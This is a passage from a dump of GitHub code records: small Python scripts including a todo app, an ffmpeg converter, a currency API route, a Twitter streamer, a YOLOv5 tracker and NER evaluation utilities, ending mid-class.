os.path.exists(DATABASEFILE):\n        with open(DATABASEFILE, 'w') as csvfile:\n            fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n            writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n            writer.writeheader()\n    \n\ndef main():\n    clear_console()\n    todo_list(write=True)\n\n    while True:\n        \n        action = input(\"Please specify a command [add, mark, unmark, archive, x to exit]: \")\n        clear_console()\n\n        if action == \"add\": #loop: adding todo items\n            item_to_add=' '\n            todo_list(write=True)\n            while item_to_add!='':\n                item_to_add=input('Add an item (or press enter to leave): ')\n                if (item_to_add!=''):\n                    add(item_to_add)\n                else:\n                    clear_console()\n                    todo_list(write=True)\n            \n\n        elif action == \"list\": #this is not used, list is always visible\n            clear_console()\n            todo_list(write=True)\n\n        elif action == \"mark\":\n            mark_todo()\n            \n\n        elif action == \"unmark\":\n            mark_todo(False)\n            \n\n        elif action == \"archive\":\n            archive()\n            \n\n        elif action == \"x\": #exit program\n            break    \n        \n        else:\n            print_warning(\"Error: wrong command!\", 'red')    \n            todo_list(write=True)\n            \n\n\n\ncheckdatabase() #if the file doesn't exist then create it\nmain()","repo_name":"michalosak/calculator","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"31343441875","text":"import subprocess\nimport os\nimport stat\nimport platform\n\nfrom helpers import asyncronize_function\n\nconverter_path = None\n\nif \"Windows\" in platform.architecture()[1]:\n converter_path = \"./ffmpeg.exe\"\nelse:\n converter_path = \"./ffmpeg\"\n st = os.stat(\"./ffmpeg\")\n os.chmod(\"./ffmpeg\", st.st_mode | stat.S_IEXEC)\n\nasync def convert(voice_ogg_content):\n completedProcess = await asyncronize_function(\n subprocess.run,\n [converter_path, \"-i\", \"pipe:0\", \"-f\", \"wav\", \"pipe:1\"],\n input=voice_ogg_content,\n capture_output=True\n )\n return completedProcess.stdout","repo_name":"dozen1488/telebot","sub_path":"modules/convert_ogg_module.py","file_name":"convert_ogg_module.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"28184811690","text":"from dataclasses import asdict\n\nimport requests\nfrom flask import request, jsonify, Blueprint\nfrom config import configuration\nfrom app.dto.get_exchange_rate_response import GetExchangeRateResponse\nfrom app.helpers.check_currencies import check_currencies\nfrom app.decorators.auth import token_required\n\nmodule = Blueprint(\"exchange\", __name__, url_prefix=\"/exchange\")\n\n\n@module.route('/pair', methods=['POST', 'GET'])\n@token_required()\ndef get_exchange_rate():\n from_currency = request.json['from'] # marshmallow Validation icin.\n to_currency = request.json['to']\n url = configuration.BASE_URL + configuration.API_KEY\n if check_currencies(from_currency, to_currency):\n pair_url = url + \"/pair/\" + from_currency + \"/\" + to_currency\n print(\"pair_url \" + pair_url)\n print(\"pair_url \" + pair_url)\n response = requests.get(pair_url)\n conversion_rate = response.json()['conversion_rate']\n base_code = response.json()['base_code']\n target_code = response.json()['target_code']\n return asdict(\n GetExchangeRateResponse(conversion_rate=conversion_rate,\n base_code=base_code,\n target_code=target_code))\n else:\n return jsonify({\"conversion_rate\": \"The Currency is not correct!!!\"})\n","repo_name":"ozgurshahin/ExchangeRateApi","sub_path":"app/routes/exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"36782941916","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport json\nimport twitter_credentials as tw\nfrom google.cloud import pubsub_v1\n#from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n\n#analyzer = SentimentIntensityAnalyzer()\n\nproject_id = \"cf-learninggcp-123\"\ntopic_name = \"tweets\"\n\npublisher = pubsub_v1.PublisherClient()\ntopic_path = publisher.topic_path(project_id, topic_name)\n\n#consumer key, consumer secret, access token, access secret.\nckey=tw.CONSUMER_KEY\ncsecret=tw.CONSUMER_SECRET\natoken=tw.ACCESS_TOKEN\nasecret=tw.ACCESS_TOKEN_SECRET\n\nclass listener(StreamListener):\n\n def on_data(self, data):\n try:\n data = json.loads(data)\n tweet = data['text']\n created_at = data['created_at']\n source = data['source']\n usuario = data['user']['name']\n ubicacion = data['user']['location']\n coordenadas = data['geo']\n time_ms = data['timestamp_ms']\n # vs = analyzer.polarity_scores(tweet)\n # sentiment = vs['compound']\n mensaje = json.dumps({\"twitter\": tweet, \"time_stamp\": time_ms, \"created_at\": created_at, \"source\": source, 'usuario': usuario, 'ubicacion': ubicacion, 'coordenadas': coordenadas})\n\n print(mensaje)\n future = publisher.publish(topic_path, mensaje)\n print(future.result())\n\n except KeyError as e:\n print(str(e))\n return(True)\n\n def on_error(self, status):\n print(status)\n\nauth = OAuthHandler(ckey, csecret)\nauth.set_access_token(atoken, asecret)\n\ntwitterStream = Stream(auth, listener())\ntwitterStream.filter(track=[\"fibertel\", \"cablevision\", \"@personal\"])","repo_name":"cesarfarallo/twitter","sub_path":"twitter_TECO.py","file_name":"twitter_TECO.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"22041190542","text":"# 팔씨름 문제\n\n# 소정이와 세정이는 점심 값을 누가 낼 지 정하기 위해 팔씨름을 하기로 했다. 공정하고 재밌는 경기를 위해 둘은 15번 팔씨름을 하여 8번 이상 이기는 사람이 점심 값을 면제받기로 하였다.\n\n# 둘은 지금까지 k번의 팔씨름을 진행했다. 이 결과는 길이가 k인 ‘o’ 또는 ‘x’로만 구성된 문자열 S[1..k]로 나타낼 수 있다. S[i]가 ‘o’면 소정이가 i번째 경기에서 승리했다는 것이고, ‘x’면 패배했다는 것이다.\n\n# 소정이는 앞으로 팔씨름을 15번째 경기까지 진행했을 때 자신이 점심값을 면제받을 가���성이 있는지 알고자 한다. 이를 대신해 주는 프로그램을 작성하라.\n\n# [입력]\n# 첫 번째 줄에 테스트 케이스의 수 T가 주어진다.\n# 각 테스트 케이스는 하나의 줄로 이루어진다. 각 줄에는 ‘o’ 또는 ‘x’로만 구성된 길이가 1 이상 15 이하인 문자열 S가 주어진다.\n\n# [출력]\n# 각 테스트 케이스마다, 소정이가 점심값을 면제받을 가능성이 있다면 ‘YES’, 없다면 ‘NO’를 출력한다.\n\n# 입력\n# 3\n# oxoxoxoxoxoxoxo\n# x\n# xxxxxxxxxxxx\n\n# 출력\n# #1 YES\n# #2 YES\n# #3 NO\n\nT = int(input())\nfor tc in range(1, T+1):\n s = input()\n \n # 이긴 횟수 카운트 \n num_wins = s.count('o')\n\n # 남은 판수 카운트\n num_remaining = 15 - len(s)\n\n # 남은 판수와 이긴 횟수를 더한 것이 8번 이상이면 승리 가능성\n if num_wins + num_remaining >= 8:\n print(f\"#{tc} YES\")\n else:\n print(f\"{tc} NO\")","repo_name":"glory0224/Algorithm","sub_path":"SWEA/D3/arm wrestling.py","file_name":"arm wrestling.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"30393608348","text":"r\"\"\"Parse command line arguments\n\nCommand parameters:\n refresh : bool - Refresh data from remote server.\n num_workers : int - Number of workers for threading.\n options : dict - Options for GET request to hh api.\n\nExample:\n options:\n {\n \"text\": \"Python Developer\",\n \"area\": 1,\n \"per_page\": 50\n }\n\nParser parameters:\n update : bool - Update JSON config if needed.\n\n------------------------------------------------------------------------\n\nGNU GENERAL PUBLIC LICENSE\nVersion 3, 29 June 2007\n\nCopyright (c) 2020 Kapitanov Alexander\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\nTHERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY\nAPPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT\nHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT\nNOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND\nPERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE\nDEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR\nOR CORRECTION.\n\n------------------------------------------------------------------------\n\"\"\"\n\n# Authors : Alexander Kapitanov\n# ...\n# Contacts : \n# License : GNU GENERAL PUBLIC LICENSE\n\nimport argparse\nimport json\nfrom typing import Dict, Optional, Sequence\n\n\nclass Settings:\n r\"\"\"Researcher parameters\n\n Parameters\n ----------\n config_path : str\n Path to config file\n input_args : tuple\n Command line arguments for tests.\n no_parse : bool\n Disable parsing arguments from command line.\n\n Attributes\n ----------\n options : dict\n Options for GET request to API.\n refresh : bool\n Refresh data from remote server.\n save_result : bool\n Save DataFrame with parsed vacancies to CSV file\n num_workers : int\n Number of workers for threading.\n rates : dict\n Dict of currencies. 
For example: {\"RUB\": 1, \"USD\": 0.001}\n \"\"\"\n\n def __init__(\n self, config_path: str, input_args: Optional[Sequence[str]] = None, no_parse: bool = False,\n ):\n self.options: Optional[Dict] = None\n self.rates: Optional[Dict] = None\n self.refresh: bool = False\n self.num_workers: int = 1\n self.save_result: bool = False\n self.update: bool = False\n\n # Get config from file\n with open(config_path, \"r\") as cfg:\n config: Dict = json.load(cfg)\n\n if not no_parse:\n params = self.__parse_args(input_args)\n\n for key, value in params.items():\n if value is not None:\n if key in config:\n config[key] = value\n if \"options\" in config and key in config[\"options\"]:\n config[\"options\"][key] = value\n\n self.update = params.get(\"update\", False)\n if params[\"update\"]:\n with open(config_path, \"w\") as cfg:\n json.dump(config, cfg, indent=2)\n\n # Update attributes:\n for key, value in config.items():\n if hasattr(self, key):\n setattr(self, key, value)\n\n def __repr__(self):\n txt = \"\\n\".join([f\"{k :<16}: {v}\" for k, v in self.__dict__.items()])\n return f\"Settings:\\n{txt}\"\n\n def update_params(self, **kwargs):\n \"\"\"Update object params\"\"\"\n for key, value in kwargs.items():\n if hasattr(self, key) and value is not None:\n setattr(self, key, value)\n\n @staticmethod\n def __parse_args(inputs_args) -> Dict:\n \"\"\"Read arguments from command line.\n\n Returns\n -------\n arguments : dict\n Parsed arguments from command line. Note: some arguments are positional.\n\n \"\"\"\n\n parser = argparse.ArgumentParser(description=\"HeadHunter vacancies researcher\")\n parser.add_argument(\n \"-t\", \"--text\", action=\"store\", type=str, default=None, help='Search query text (e.g. \"Machine learning\")',\n )\n parser.add_argument(\n \"-p\", \"--professional_roles\", action=\"store\", type=int, default=None,\n help='Professional role filter (Possible roles can be found here https://api.hh.ru/professional_roles)',\n nargs='*'\n )\n parser.add_argument(\n \"-n\", \"--num_workers\", action=\"store\", type=int, default=None, help=\"Number of workers for multithreading.\",\n )\n parser.add_argument(\n \"-r\", \"--refresh\", help=\"Refresh cached data from HH API\", action=\"store_true\", default=None,\n )\n parser.add_argument(\n \"-s\", \"--save_result\", help=\"Save parsed result as DataFrame to CSV file.\", action=\"store_true\", default=None,\n )\n parser.add_argument(\n \"-u\", \"--update\", action=\"store_true\", default=None, help=\"Save command line args to file in JSON format.\",\n )\n\n params, unknown = parser.parse_known_args(inputs_args)\n # Update config from command line\n return vars(params)\n\n\nif __name__ == \"__main__\":\n settings = Settings(\n config_path=\"../settings.json\", input_args=(\"--num_workers\", \"5\", \"--refresh\", \"--text\", \"Data Scientist\"),\n )\n\n print(settings)\n","repo_name":"hukenovs/hh_research","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5739,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"18"}
+{"seq_id":"157725906","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Created on 2021/6/23 16:55\n Filename : yolov5_tracker.py\n Author : Taosy.W\n Zhihu : https://www.zhihu.com/people/1105936347\n Github : https://github.com/AFei19911012\n Description: 人车检测追踪,参考源码:https://github.com/mikel-brostrom/Yolov5_DeepSort_Pytorch.git\n\"\"\"\n\n# =======================================================\nimport cv2\nimport torch\nimport os\n\nfrom deep_sort.deep_sort import DeepSort\nfrom deep_sort.utils.parser import get_config\nfrom yolov5_detector import YOLOv5Detector\n\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'TRUE'\n\n\ndef draw_image(image, bbox_container, obj_ids):\n \"\"\" 绘制人车标签 \"\"\"\n \"\"\" 线宽 \"\"\"\n tl = 2 or round(0.002 * (image.shape[0] + image.shape[1]) / 2) + 1\n for i, bbox in enumerate(bbox_container):\n label = bbox['class']\n x1, y1, x2, y2 = bbox['box']\n c1, c2 = (x1, y1), (x2, y2)\n if label == 'person':\n color = (255, 0, 0)\n elif label == 'car':\n color = (0, 0, 255)\n else:\n color = (0, 255, 0)\n cv2.rectangle(image, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)\n \"\"\" 字体宽度 \"\"\"\n tf = max(tl - 1, 1)\n label_show = f'{label}-{obj_ids[i]}'\n t_size = cv2.getTextSize(label_show, 0, fontScale=tl/3, thickness=tf)[0]\n c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3\n \"\"\" filled \"\"\"\n cv2.rectangle(image, c1, c2, color, cv2.FILLED, cv2.LINE_AA)\n cv2.putText(image, label_show, (c1[0], c1[1] - 2), 0, tl/3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)\n\n\ndef xyxy_to_xywh(box):\n \"\"\" 目标框转换 \"\"\"\n x1, y1, x2, y2 = box\n w = x2 - x1\n h = y2 - y1\n x_c = int(x1 + w/2)\n y_c = int(y1 + h/2)\n return [x_c, y_c, w, h]\n\n\ndef cut_bbox_container(bbox_container):\n \"\"\" 只保留人车信息 \"\"\"\n container = []\n for bbox in bbox_container:\n label = bbox['class']\n confidence = bbox['confidence']\n box = bbox['box']\n if label in ['person', 'car']:\n container.append({'class': label, 'confidence': confidence, 'box': box})\n return container\n\n\ndef main():\n video_name = 'car.mp4'\n # video_name = 'car.mp4'\n cap = cv2.VideoCapture(f'data/videos/{video_name}')\n fource = cv2.VideoWriter_fourcc(*'mp4v')\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n vid_writer = cv2.VideoWriter(f'runs/track/{video_name}.mp4', fource, 30, (width, height))\n \"\"\" yolov5 目标检测器 \"\"\"\n yolov5_detector = YOLOv5Detector()\n \"\"\" deepsort 追踪器 \"\"\"\n cfg = get_config()\n cfg.merge_from_file(\"deep_sort/configs/deep_sort.yaml\")\n deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,\n max_dist=cfg.DEEPSORT.MAX_DIST,\n min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,\n nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP,\n max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,\n max_age=cfg.DEEPSORT.MAX_AGE,\n n_init=cfg.DEEPSORT.N_INIT,\n nn_budget=cfg.DEEPSORT.NN_BUDGET,\n use_cuda=True)\n window_name = 'Real-time tracking'\n while True:\n state, frame = cap.read()\n if not state:\n break\n \"\"\" 检测目标 \"\"\"\n image, bbox_container = yolov5_detector(frame)\n \"\"\" 仅保留人车信息\"\"\"\n bbox_container = cut_bbox_container(bbox_container)\n \"\"\" 初始化一些变量 \"\"\"\n xywh_bboxs = []\n labels = []\n confs = []\n for bbox in bbox_container:\n xywh_bboxs.append(xyxy_to_xywh(bbox['box']))\n labels.append(bbox['class'])\n confs.append(bbox['confidence'])\n \"\"\" 检测到目标后才有追踪 \"\"\"\n if labels:\n \"\"\" detections --> deepsort \"\"\"\n xywhs = torch.Tensor(xywh_bboxs)\n confss = torch.Tensor(confs)\n outputs = deepsort.update(xywhs, confss, labels, frame)\n obj_ids = []\n 
bbox_draw = []\n if len(outputs) > 0:\n for (x1, y1, x2, y2, label, track_id) in outputs:\n bbox_draw.append({'class': label, 'box': [x1, y1, x2, y2]})\n obj_ids.append(track_id)\n \"\"\" 绘图显示 \"\"\"\n draw_image(frame, bbox_draw, obj_ids)\n \"\"\" 输出一些信息 \"\"\"\n for info in bbox_draw:\n print(info)\n print(obj_ids)\n print('---')\n cv2.imshow(window_name, frame)\n vid_writer.write(frame)\n cv2.waitKey(1)\n \"\"\" 点 x 退出 \"\"\"\n if cv2.getWindowProperty(window_name, cv2.WND_PROP_AUTOSIZE) < 1:\n break\n cap.release()\n vid_writer.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AFei19911012/PythonSamples","sub_path":"yolov5/yolov5_tracker.py","file_name":"yolov5_tracker.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"}
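A tiny worked example of the box conversion the tracker relies on: xyxy_to_xywh turns corner coordinates into a centre point plus width/height, which is the format DeepSort's update() consumes. For corners (100, 40) and (180, 120), width and height are both 80, so the centre is (100 + 40, 40 + 40):

    print(xyxy_to_xywh([100, 40, 180, 120]))  # [140, 80, 80, 80]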
+{"seq_id":"71210623079","text":"import sys\nimport os\nimport os.path\nimport subprocess\nimport re\n\nfrom cpc.lib.gromacs import cmds\n\ndef checkTrajectory(filename):\n \"\"\"Check an existing trajectory and return the trajectory time in ns, \n the delta t, and the number of frames\"\"\"\n cmdnames = cmds.GromacsCommands()\n proc=subprocess.Popen(cmdnames.gmxcheck.split() + [\"-f\", filename],\n stdin=None,\n stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE)\n ret=proc.communicate()\n step=re.compile('^Step\\s*([0-9]*)\\s*([0-9]*)', re.MULTILINE)\n if proc.returncode != 0: \n sys.stderr.write('pwd= %s\\n'%os.getcwd())\n sys.stderr.write('Got: %s\\n'%(unicode(ret[0], errors=\"ignore\")))\n match=step.search(ret[0])\n frames=int(match.group(1))\n dt=float(match.group(2))\n ns=(frames-1)*dt/1000.\n sys.stderr.write(\"Using trajectory %s with %g ns of trajectories\\n\"%\n (filename, ns))\n # return the time in ns\n return (ns, dt, frames)\n\n\n\n","repo_name":"gromacs/copernicus","sub_path":"cpc/lib/msm/check_traj.py","file_name":"check_traj.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"}
+{"seq_id":"31599944137","text":"filename = input(\"Enter file name: \")\nfileholder = open(filename)\ncount = 0\nemails = {}\nfor line in fileholder:\n nline = line.rstrip()\n if 'From' in nline and not \"From:\" in nline:\n lsplit = nline.split()\n emails[lsplit[1]] = emails.get(lsplit[1], 0) + 1\n else:\n continue\n\nbcount = None\nbemail = None\n\nfor email,occurrences in emails.items():\n if bcount is None or occurrences > bcount:\n bemail = email\n bcount = occurrences\n\nprint(bemail, bcount)\n","repo_name":"VerisimilitudeX/Python-For-Everybody--Python-Data-Structures-Certification","sub_path":"Assignment 9.4.py","file_name":"Assignment 9.4.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"70341721960","text":"import MySQLdb\r\ntry:\r\n db=MySQLdb.connect(\"192.168.3.188\",\"training\",\"training@123\",\"int_b6\")\r\n # print(\"success\")\r\n cursor = db.cursor()\r\n cursor.execute(\"SELECT VERSION()\")\r\n data=cursor.fetchall()\r\n print(data)\r\n db.close()\r\nexcept:\r\n print(\"error\")\r\n","repo_name":"arjun2038/Python-Basic-Programming","sub_path":"DataBase/Connection.py","file_name":"Connection.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"21193555488","text":"import numpy as np\n\n\ndef subtract_smooth(x, y):\n resized_y = y.copy()\n resized_y.resize(x.shape)\n y_new = resized_y - median_filter(x, resized_y, 1.)\n return y_new\n\n\ndef median_filter(x, y, width):\n # Error: IndexError: boolean index did not match indexed array along dimension 0; dimension is 4 but\n # corresponding boolean dimension is 5\n # I searched in google about 'boolean index did not match indexed array along dimension'\n # I noticed that y_new has the same shape as y, but in this case x has another shape\n # The calculation inside the y brackets returns an array of booleans that has a different shape than y\n # Maybe we can fill with zeros the smallest array in order to keep all the data points but I'm not sure\n y_new = np.zeros(y.shape)\n for i in range(len(x)):\n y_new[i] = np.median(y[np.abs(x - x[i]) < width * 0.5])\n return y_new\n\n\nprint(subtract_smooth(np.array([1, 2, 3, 4, 5]), np.array([4, 5, 6, 8])))\n","repo_name":"kevinszuchet/itc-fellows-part-time","sub_path":"pre_course/ex10_subtract_smooth.py","file_name":"ex10_subtract_smooth.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70569468840","text":"# coding Statement: Write a program to find Sum of digits of a number\r\n\r\n# Description\r\n\r\n# Get a number from user and then find the sum of the digits in the given number.\r\n\r\n# E.g. let the number = 341\r\n\r\n# Sum of digits is 3+4+1= 8\r\n\r\n# Input :4521\r\n\r\n# Output :12\r\n\r\nn=int(input(\"Enter your number : \"))\r\nnum=str(n)\r\nsum=0\r\nfor i in num:\r\n sum=sum+int(i)\r\nprint(\"sum :\",sum)","repo_name":"Raviteja0524/Python_50","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"22171671602","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport itertools\nfrom sklearn.metrics import confusion_matrix, f1_score\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\nfrom utils.skseq.sequences.sequence import Sequence\n\n\ndef evaluate_corpus(sequences, sequences_predictions):\n \"\"\"Evaluate classification accuracy at corpus level, comparing with\n gold standard.\"\"\"\n total = 0.0\n correct = 0.0\n for i, sequence in enumerate(sequences):\n pred = sequences_predictions[i]\n for j, y_hat in enumerate(pred.y):\n if sequence.y[j] != 0: #0 is the index of the \"O\" tag\n if sequence.y[j] == y_hat:\n correct += 1\n total += 1\n return correct / total\n\n\ndef show_confusion_matrix(sequences, preds, sp=None, hmm=False, normalize=False, positions=None, labels=None):\n if hmm:\n y_true = [item for sublist in sequences for item in sublist]\n y_pred = [item for sublist in preds for item in sublist]\n else:\n y_true = []\n y_pred = []\n for seq, pred in zip(sequences, preds):\n y_true.extend(seq.y)\n y_pred.extend(pred.y.tolist())\n\n cm = confusion_matrix(y_true, y_pred)\n\n threshold = 24953\n cm_clipped = np.clip(cm, a_min=0, a_max=threshold)\n\n plt.figure(figsize=(10, 10))\n plt.imshow(cm_clipped, interpolation='nearest', cmap=plt.get_cmap('Blues'))\n plt.title(\"Confusion matrix\")\n #plt.colorbar()\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n thresh = threshold / 1.5 if normalize else threshold / 2\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n if normalize:\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n else:\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n if (positions==None) | (labels==None):\n positions = list(sp.state_labels.values())\n labels = list(sp.state_labels.keys())\n\n plt.xticks(positions, labels)\n plt.yticks(positions, labels)\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.show()\n\n\ndef get_f1_score(sequences, preds, hmm=False):\n if hmm:\n y_true = [item for sublist in sequences for item in sublist]\n y_pred = [item for sublist in preds for item in sublist]\n else:\n y_true = []\n y_pred = []\n for seq, pred in zip(sequences, preds):\n y_true.extend(seq.y)\n y_pred.extend(pred.y.tolist())\n\n return f1_score(y_true, y_pred, average='weighted')\n\n\ndef tiny_test(model, train_seq=None, hmm=False, state_to_pos=None, decode=\"viterbi\"):\n\n sentences = [\n \"The programmers from Barcelona might write a sentence without a spell checker.\",\n \"The programmers from Barchelona cannot write a sentence without a spell checker.\",\n \"Jack London went to Parris.\",\n \"Jack London went to Paris.\",\n \"Bill gates and Steve jobs never though Microsoft would become such a big company.\",\n \"Bill Gates and Steve Jobs never though Microsof would become such a big company.\",\n \"The president of U.S.A though they could win the war.\",\n \"The president of the United States of America though they could win the war.\",\n \"The king of Saudi Arabia wanted total control.\",\n \"Robin does not want to go to Saudi Arabia.\",\n \"Apple is a great company.\",\n \"I really love apples and oranges.\",\n \"Alice and Henry went to the Microsoft store to buy a new computer during their trip to New York.\"\n ]\n \n y_pred = []\n if hmm:\n for p in 
sentences:\n pred = model.predict_labels(p.split())\n seq = Sequence(x=p.split(), y=pred)\n print(seq, '\\n') \n y_pred.extend(pred)\n y_pred = [state_to_pos[w] for w in y_pred]\n else:\n preds = []\n for p in sentences:\n seq = Sequence(x=p.split(), y=[int(0) for w in p.split()])\n if decode==\"viterbi\":\n pred = model.viterbi_decode(seq)[0]\n else: #to check if posterior decode works better\n pred = model.posterior_decode(seq)\n preds.append(pred)\n y_pred.extend(pred.y.tolist())\n print(pred.to_words(train_seq, only_tag_translation=True), '\\n')\n\n # evaluate results\n y_true = [0,0,0,1,0,0,0,0,0,0,0,0] + [0,0,0,0,0,0,0,0,0,0,0,0]\n y_true += [6,7,0,0,0] + [6,7,0,0,1]\n y_true += [6,7,0,6,7,0,0,4,0,0,0,0,0,0] + [6,7,0,6,7,0,0,0,0,0,0,0,0,0]\n y_true += [0,0,0,1,0,0,0,0,0,0] + [0,0,0,0,1,5,5,5,0,0,0,0,0,0]\n y_true += [0,0,0,1,5,0,0,0] + [6,0,0,0,0,0,0,1,5]\n y_true += [4,0,0,0,0] + [0,0,0,0,0,0]\n y_true += [6,0,6,0,0,0,4,0,0,0,0,0,0,0,0,0,0,1,5]\n\n correct = total = 0\n for y, y_hat in zip(y_true, y_pred):\n if y != 0: #0 is the index of the \"O\" tag\n if y == y_hat:\n correct += 1\n total += 1\n print(\"\\n===============================\")\n print(f\"Accuracy in TINY TEST = {round(correct/total, 4)}\")\n print(\"===============================\")\n\n\n\nclass BiLSTM_CRF_v2(nn.Module):\n\n def __init__(self, vocab_size, tag_to_ix, embedding_dim, hidden_dim):\n super(BiLSTM_CRF_v2, self).__init__()\n self.embedding_dim = embedding_dim\n self.hidden_dim = hidden_dim\n self.vocab_size = vocab_size\n self.tag_to_ix = tag_to_ix\n self.tagset_size = len(tag_to_ix)\n\n self.word_embeds = nn.Embedding(vocab_size, embedding_dim)\n self.lstm = nn.LSTM(embedding_dim, hidden_dim // 2,\n num_layers=1, bidirectional=True)\n\n # Maps the output of the LSTM into tag space.\n self.hidden2tag = nn.Linear(hidden_dim, self.tagset_size)\n\n # Matrix of transition parameters. 
Entry i,j is the score of\n # transitioning *to* i *from* j.\n self.transitions = nn.Parameter(\n torch.randn(self.tagset_size, self.tagset_size))\n\n # These two statements enforce the constraint that we never transfer\n # to the start tag and we never transfer from the stop tag\n self.transitions.data[tag_to_ix[START_TAG], :] = -10000\n self.transitions.data[:, tag_to_ix[STOP_TAG]] = -10000\n\n\n self.hidden = self.init_hidden()\n\n def init_hidden(self):\n return (torch.randn(2, 1, self.hidden_dim // 2),\n torch.randn(2, 1, self.hidden_dim // 2))\n\n def _forward_alg(self, feats):\n # Do the forward algorithm to compute the partition function\n init_alphas = torch.full((1, self.tagset_size), -10000.)\n # START_TAG has all of the score.\n init_alphas[0][self.tag_to_ix[START_TAG]] = 0.\n\n # Wrap in a variable so that we will get automatic backprop\n forward_var = init_alphas\n forward_var = forward_var\n\n # Iterate through the sentence\n for feat in feats:\n alphas_t = [] # The forward tensors at this timestep\n for next_tag in range(self.tagset_size):\n # broadcast the emission score: it is the same regardless of\n # the previous tag\n emit_score = feat[next_tag].view(\n 1, -1).expand(1, self.tagset_size)\n # the ith entry of trans_score is the score of transitioning to\n # next_tag from i\n trans_score = self.transitions[next_tag].view(1, -1)\n # The ith entry of next_tag_var is the value for the\n # edge (i -> next_tag) before we do log-sum-exp\n next_tag_var = forward_var + trans_score + emit_score\n # The forward variable for this tag is log-sum-exp of all the\n # scores.\n alphas_t.append(log_sum_exp(next_tag_var).view(1))\n forward_var = torch.cat(alphas_t).view(1, -1)\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\n alpha = log_sum_exp(terminal_var)\n return alpha\n\n def _get_lstm_features(self, sentence):\n self.hidden = self.init_hidden()\n embeds = self.word_embeds(sentence).view(len(sentence), 1, -1)\n lstm_out, self.hidden = self.lstm(embeds, self.hidden)\n lstm_out = lstm_out.view(len(sentence), self.hidden_dim)\n lstm_feats = self.hidden2tag(lstm_out)\n return lstm_feats\n\n def _score_sentence(self, feats, tags):\n # Gives the score of a provided tag sequence\n score = torch.zeros(1)\n tags = torch.cat([torch.tensor([self.tag_to_ix[START_TAG]], dtype=torch.long), tags])\n for i, feat in enumerate(feats):\n score = score + \\\n self.transitions[tags[i + 1], tags[i]] + feat[tags[i + 1]]\n score = score + self.transitions[self.tag_to_ix[STOP_TAG], tags[-1]]\n return score\n\n def _viterbi_decode(self, feats):\n backpointers = []\n\n # Initialize the viterbi variables in log 